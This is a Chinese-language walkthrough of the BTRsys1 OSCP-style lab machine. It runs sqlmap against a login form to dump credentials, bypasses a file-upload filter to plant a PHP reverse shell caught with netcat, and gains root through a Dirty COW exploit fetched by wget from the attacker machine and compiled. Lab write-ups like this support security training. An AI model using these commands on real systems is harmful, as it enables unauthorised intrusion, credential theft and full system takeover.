OSCP系列靶机—BTRsys1
原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)
一、主机发现
二、端口探测
1、快速扫描
2、全端口扫描
共开放三个端口
3、漏洞探测
nmap --script=vuln -p 21,22,80 192.168.31.72
上面给出了端口对应的服务信息,就不再进行服务版本探测了
ftp 存在任意用户登陆,其他端口没啥信息
三、FTP信息收集
啥也没有,不应该啊;尝试文件上传
权限被拒绝,无法上传
四、HTTP信息收集
1、首页及源代码
他这里还一直在转圈圈,加载慢了很,估计是后端有一直在执行的操作;看源代码
噢,我说怎么加载这么慢,原来是css、js等请求了外部链接;纵观这个源代码,只有a标签的hakkimizda.php链接是我们感兴趣的
2、hakkimizda.php 文件
这里疑似有文件包含的嫌疑,它的头部跟首页是一样的;把这段话拿给AI解析下
是一段土耳其语言说的一段话,后面的渗透测试步骤这里似乎给了提示,不知道是否与此靶场有关
3、做目录扫描
到这里基本上没线索了,做一遍目录扫描
倒是发现几个有趣的文件和文件夹;挑有价值的讲一下
4、login.php 文件
本想尝试下弱口令,但是发现这个地方没有走后端;校验是在前端中
看源代码;原来是在前端先校验了下用户名中@后面是不是btrisk.com,符合要求才向后端提交
我们随便用一个账号如 123@btrisk.com 任意密码,来到了后端的personel.php文件
这里有个报错,说缺少参数;下面没有显示具体的字段信息;应该是用户名符合要求所以进来这个页面,但是因为密码不正确所以没有添加上必要的参数;既然如此,用sqlmap 跑一下看是否存在sql注入漏洞
5、SQL注入漏洞
sqlmap -u http://192.168.31.72/personel.php --data "kullanici_adi=admin@btrisk.com&parola=123456" --batch
OK,结果也是非常明显,存在SQL注入,那查看用户的信息
当我们查到字段的时候,发现有这么些字段,看哪个字段呢?
在登录框中已经给出了答案
sqlmap -u http://192.168.31.72/personel.php --data "kullanici_adi=admin@btrisk.com&parola=123456" --batch -D "deneme" -T "user" -C "Kullanici_Adi,Parola" --dump
俩用户,密码都一样的昂
6、登陆后台
登陆之后,后台果然变了,有文件上传
五、Getshell
本想上传一个txt文件试试水,但给我拦截了,说只能jpg,png格式
我把txt 后缀改成jpg,继续上传
上传成功,但是没给路径;欸,这个时候想起来做目录扫描中发现的/uploads/目录了,去看下
果然在这里;那上传php 反弹shell 文件;注意改成自己的IP和端口
上传用bp 抓包改后缀
访问webshell,并用nc 进行监听,成功getshell
六、权限提升
1、信息收集
发现数据库的账号码,而且还是root 高权限用户
但是运行mysql 的用户是mysql,依然是低权限用户,无法通过数据库进行提权;但是看到这个linux 的内核版本较低,是否可以使用脏牛提权呢?
2、脏牛提权至root
查询有关该内核版本提权的脚本
有俩,感觉能成功,尝试第一个
脚本上写了食用方法,照着来就行,将脚本上传至靶机后编译运行
// 攻击机
python3 -m http.server
// 靶机
cd /tmp;wget http://192.168.31.58:8000/37292.c
欸,没有gcc 文件,那用cc ;把这里的gcc 改成 cc;之后重新来一遍
//cc执行
cc 37292.c -o ofs
提权成功
原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)
589
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
